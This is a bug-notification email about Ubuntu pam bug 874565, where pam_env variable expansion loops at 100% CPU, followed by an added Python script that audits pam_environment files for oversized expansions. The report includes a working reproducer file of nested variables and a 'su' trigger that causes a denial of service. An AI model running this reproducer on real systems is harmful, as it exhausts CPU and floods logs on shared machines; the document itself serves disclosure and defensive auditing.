[Bug 874565] Re: 100% CPU utilization in pam_env parsing
Marc Deslauriers
marc.deslauriers at canonical.com
Mon Oct 24 19:22:15 UTC 2011
** Visibility changed to: Public
--
You received this bug notification because you are a member of Ubuntu
Foundations Bugs, which is subscribed to pam in Ubuntu.
https://bugs.launchpad.net/bugs/874565
Title:
100% CPU utilization in pam_env parsing
Status in “pam” package in Ubuntu:
Fix Released
Bug description:
The pam_env variable expansion routine does not correctly abort under
some situations when expanding variable names. This triggers 100% CPU
use and syslog flooding.
To reproduce:
cat <<EOM >~/.pam_environment
EVIL_FILLER_255 DEFAULT=BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
EVIL_FILLER_256 DEFAULT=${EVIL_FILLER_255}B
EVIL_FILLER_1024 DEFAULT=${EVIL_FILLER_256}${EVIL_FILLER_256}${EVIL_FILLER_256}${EVIL_FILLER_256}
EVIL_FILLER_8191 DEFAULT=${EVIL_FILLER_1024}${EVIL_FILLER_1024}${EVIL_FILLER_1024}${EVIL_FILLER_1024}${EVIL_FILLER_1024}${EVIL_FILLER_1024}${EVIL_FILLER_1024}${EVIL_FILLER_256}${EVIL_FILLER_256}${EVIL_FILLER_256}${EVIL_FILLER_255}
EVIL_OVERFLOW_DOS DEFAULT=${EVIL_FILLER_8191}AAAA
EOM
This will trigger CPU usage for whatever process runs the PAM stack.
For example, to make root run away, run "su - $USER" and correctly
authenticate.
To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/pam/+bug/874565/+subscriptions
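
Added example (not part of the original bug report or of the pam source): a Python audit that computes the expanded length of each variable in a pam_environment-style file and flags entries that would not fit in the expansion buffer. The 8192-byte limit is an assumption inferred from the EVIL_FILLER_8191 name in the reproducer; the sample names (A255, OVER) are constructed, unknown references count as empty, and quoting, escapes and @{ITEM} references are not modelled.

```python
import re

MAX_ENV = 8192  # assumed expansion buffer size (inferred from the reproducer's names)
REF = re.compile(r"\$\{([^}]*)\}")
FIELD = re.compile(r"(DEFAULT|OVERRIDE)=(\S*)")

def expanded_length(value, known):
    """Length of value after ${NAME} substitution, without building the string."""
    total, pos = 0, 0
    for m in REF.finditer(value):
        total += m.start() - pos             # literal text before the reference
        total += known.get(m.group(1), 0)    # unknown names count as empty (assumption)
        pos = m.end()
    return total + len(value) - pos

def audit(text, limit=MAX_ENV):
    """Return [(lineno, name, length)] for variables whose expansion exceeds the buffer."""
    known, findings = {}, []
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        name, rest = parts[0], parts[1] if len(parts) > 1 else ""
        lengths = {k: expanded_length(v, known) for k, v in FIELD.findall(rest)}
        worst = max(lengths.values(), default=0)
        if worst + 1 > limit:                # +1 for the terminating NUL
            findings.append((lineno, name, worst))
        # later lines see OVERRIDE when it is non-empty, otherwise DEFAULT
        known[name] = lengths.get("OVERRIDE") or lengths.get("DEFAULT", 0)
    return findings

# Constructed sample with the same shape as the reproducer above.
SAMPLE = "\n".join([
    "A255 DEFAULT=" + "B" * 255,
    "A256 DEFAULT=${A255}B",
    "A1024 DEFAULT=" + "${A256}" * 4,
    "A8191 DEFAULT=" + "${A1024}" * 7 + "${A256}" * 3 + "${A255}",
    "OVER DEFAULT=${A8191}AAAA",
])

if __name__ == "__main__":
    for lineno, name, length in audit(SAMPLE):
        print(f"line {lineno}: {name} expands to {length} bytes (limit {MAX_ENV})")
```

Lengths are summed arithmetically rather than by materialising the expanded strings, so the audit itself stays cheap on deeply nested references.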